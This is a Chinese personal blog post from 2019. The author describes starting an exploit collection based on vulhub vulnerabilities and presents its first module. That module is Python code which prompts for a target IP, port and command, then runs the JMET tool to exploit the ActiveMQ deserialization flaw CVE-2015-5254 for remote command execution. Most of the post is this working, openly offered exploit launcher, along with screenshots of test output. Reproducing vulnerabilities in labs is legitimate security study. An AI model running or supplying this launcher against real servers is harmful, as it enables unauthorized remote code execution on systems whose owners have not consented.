<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="前言今天下午有个想法，嗯。暂时不得而知是什么想法，也就是写漏洞利用的项目吧。距离过年还有半个月左右，感觉越大过年没什么滋味了，小时候的朋友全部都分道扬镳。都是常规操作： 拜年——&amp;gt;收钱别人过来你这&amp;lt;—–送钱剩余时间：待在房间干自己的事情  正文12https://vulhub.org/我打算把这里的漏洞全部复现一遍，然后写个漏洞利用集合体  刚刚复现完的第一个：CVE-2015-525">
<meta name="keywords" content="Writing">
<meta property="og:type" content="article">
<meta property="og:title" content="Vulnerability project">
<meta property="og:url" content="http://422926799.github.io/posts/b780d8aa.html">
<meta property="og:site_name" content="九世的博客">
<meta property="og:description" content="前言今天下午有个想法，嗯。暂时不得而知是什么想法，也就是写漏洞利用的项目吧。距离过年还有半个月左右，感觉越大过年没什么滋味了，小时候的朋友全部都分道扬镳。都是常规操作： 拜年——&amp;gt;收钱别人过来你这&amp;lt;—–送钱剩余时间：待在房间干自己的事情  正文12https://vulhub.org/我打算把这里的漏洞全部复现一遍，然后写个漏洞利用集合体  刚刚复现完的第一个：CVE-2015-525">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://p1.pstatp.com/large/6c3a000368ec88077cc8">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/16/kSrhZD.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/16/kSrvdg.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/01/16/kSrxoQ.png">
<meta property="og:updated_time" content="2019-04-19T12:36:16.163Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Vulnerability project">
<meta name="twitter:description" content="前言今天下午有个想法，嗯。暂时不得而知是什么想法，也就是写漏洞利用的项目吧。距离过年还有半个月左右，感觉越大过年没什么滋味了，小时候的朋友全部都分道扬镳。都是常规操作： 拜年——&amp;gt;收钱别人过来你这&amp;lt;—–送钱剩余时间：待在房间干自己的事情  正文12https://vulhub.org/我打算把这里的漏洞全部复现一遍，然后写个漏洞利用集合体  刚刚复现完的第一个：CVE-2015-525">
<meta name="twitter:image" content="http://p1.pstatp.com/large/6c3a000368ec88077cc8">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Vulnerability project</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/Search">搜索</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/52a98084.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/789227f7.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://422926799.github.io/posts/b780d8aa.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://422926799.github.io/posts/b780d8aa.html&text=Vulnerability project"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://422926799.github.io/posts/b780d8aa.html&is_video=false&description=Vulnerability project"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Vulnerability project&body=Check out this article: http://422926799.github.io/posts/b780d8aa.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://422926799.github.io/posts/b780d8aa.html&name=Vulnerability project&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Vulnerability project
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">九世的博客</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-01-16T09:34:10.000Z" itemprop="datePublished">2019-01-16</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/Writing/">Writing</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>今天下午有个想法，嗯。暂时不得而知是什么想法，也就是写漏洞利用的项目吧。距离过年还有半个月左右，感觉越大过年没什么滋味了，小时候的朋友全部都分道扬镳。都是常规操作：</p>
<p>拜年——&gt;收钱<br>别人过来你这&lt;—–送钱<br>剩余时间：待在房间干自己的事情</p>
<p><img src="http://p1.pstatp.com/large/6c3a000368ec88077cc8" alt="6c3a000368ec88077cc8"></p>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://vulhub.org/</span><br><span class="line">我打算把这里的漏洞全部复现一遍，然后写个漏洞利用集合体</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.ax1x.com/2019/01/16/kSrhZD.png" alt="kSrhZD.png"></p>
<p>刚刚复现完的第一个：<br><br><a href="https://github.com/422926799/haq5201314/blob/master/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%A1%86%E6%9E%B6/doc/CVE-2015-5254.md" target="_blank" rel="noopener">CVE-2015-5254</a></p>
<p>这里就不重复了，直接看代码吧：</p>
<p>目录结构</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">├─arms</span><br><span class="line">│  └─jmet-master</span><br><span class="line">│      ├─external</span><br><span class="line">│      ├─scripts</span><br><span class="line">│      └─src</span><br><span class="line">│          ├─assembly</span><br><span class="line">│          └─main</span><br><span class="line">│              ├─java</span><br><span class="line">│              │  └─de</span><br><span class="line">│              │      └─codewhite</span><br><span class="line">│              │          └─jmet</span><br><span class="line">│              │              ├─exceptions</span><br><span class="line">│              │              ├─filter</span><br><span class="line">│              │              ├─messagetexts</span><br><span class="line">│              │              ├─payload</span><br><span class="line">│              │              │  └─impl</span><br><span class="line">│              │              ├─target</span><br><span class="line">│              │              │  └─impl</span><br><span class="line">│              │              ├─types</span><br><span class="line">│              │              └─wrapper</span><br><span class="line">│              └─resources</span><br><span class="line">├─doc</span><br><span class="line">└─plugin</span><br></pre></td></tr></table></figure>
<p>主要的脚本：<br>haq520.py</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">#author:九世</span><br><span class="line">#time:2019/1/16</span><br><span class="line"></span><br><span class="line">try:</span><br><span class="line">    import readline</span><br><span class="line">except:</span><br><span class="line">    pass</span><br><span class="line"></span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">class Main:</span><br><span class="line">    def cve_2015_5254(self):</span><br><span class="line">        obj=__import__(&apos;plugin.CVE-2015-5254&apos;,fromlist=True) #导入了plugin文件里的CVE-2015-2524</span><br><span class="line">        daoru=getattr(obj,&apos;jiancha&apos;) #调用了jiancha()函数,此时：daoru=jiancha()</span><br><span class="line">        daoru()</span><br><span class="line">        time.sleep(1)</span><br><span class="line">        daoru2=getattr(obj,&apos;run&apos;)</span><br><span class="line">        ips=input(&apos;IP:&apos;)</span><br><span class="line">        ports=input(&apos;port:&apos;)</span><br><span class="line">        execs=input(&apos;exec:&apos;)</span><br><span class="line">        daoru2(execs,ips,ports)</span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">    obj=Main()</span><br><span class="line">    exp_list=[&apos;[1] CVE-2015-5254&apos;]</span><br><span class="line">    exp_cat=&#123;&apos;1&apos;:obj.cve_2015_5254&#125;</span><br><span class="line">    while True:</span><br><span class="line">        print(&apos;[h] exploit select:)&apos;)</span><br><span class="line">        for e in exp_list:</span><br><span class="line">            print(e)</span><br><span class="line">            print(&apos;&apos;)</span><br><span class="line">            print(&apos;&apos;)</span><br><span class="line">    </span><br><span class="line">        user=input(&apos;select:&gt;&apos;)</span><br><span class="line">        if user in exp_cat:</span><br><span class="line">            exp_cat.get(user)()</span><br><span class="line">            print(&apos;&apos;)</span><br><span class="line">            print(&apos;&apos;)</span><br><span class="line">        elif user==&apos;exit&apos;:</span><br><span class="line">            break</span><br><span class="line">        else:</span><br><span class="line">            print(&apos;[e] Not Found select&apos;)</span><br><span class="line">            print(&apos;&apos;)</span><br><span class="line">            print(&apos;&apos;)</span><br><span class="line">            continue</span><br></pre></td></tr></table></figure>
<p>plugin插件里面的CVE-2015-5254</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">#author:九世</span><br><span class="line">#time:2019/1/16</span><br><span class="line"></span><br><span class="line">import os</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">def jiancha():</span><br><span class="line">    if os.path.exists(&apos;arms/jmet-master&apos;):</span><br><span class="line">        print(&apos;[h] Found arms/jmet-master&apos;)</span><br><span class="line">    else:</span><br><span class="line">        print(&apos;[q] Not Found arms/jmet-marser....&apos;)</span><br><span class="line">        exit()</span><br><span class="line"></span><br><span class="line">def run(execq,ip,port):</span><br><span class="line">    execs=&apos;java -jar arms/jmet-master/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y &quot;&#123;&#125;&quot; -Yp ROME &#123;&#125; &#123;&#125;&apos;.format(execq,ip,port)</span><br><span class="line">    zx=os.popen(execs)</span><br><span class="line">    zhenze=re.findall(&apos;ID:.*&apos;,str(zx.read()))</span><br><span class="line">    if len(zhenze)&gt;0:</span><br><span class="line">        print(&apos;[a] Found CVE-2015-5254&apos;)</span><br><span class="line">        for i in zhenze:</span><br><span class="line">            print(i)</span><br><span class="line">    else:</span><br><span class="line">        print(&apos;[q] Not Found CVE-2015-5254&apos;)</span><br></pre></td></tr></table></figure>
<p>测试效果：</p>
<p><img src="https://s2.ax1x.com/2019/01/16/kSrvdg.png" alt="kSrvdg.png"></p>
<p><img src="https://s2.ax1x.com/2019/01/16/kSrxoQ.png" alt="kSrxoQ.png"></p>
<p><b>这世界上所有的劣势都是由当事人的能力不足所造成的</b></p>
<p>转载请声明：转自422926799.github.io</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/Search">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://422926799.github.io/posts/b780d8aa.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://422926799.github.io/posts/b780d8aa.html&text=Vulnerability project"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://422926799.github.io/posts/b780d8aa.html&is_video=false&description=Vulnerability project"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Vulnerability project&body=Check out this article: http://422926799.github.io/posts/b780d8aa.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://422926799.github.io/posts/b780d8aa.html&title=Vulnerability project"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://422926799.github.io/posts/b780d8aa.html&name=Vulnerability project&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 九世
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
         
          <li><a href="/Search">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
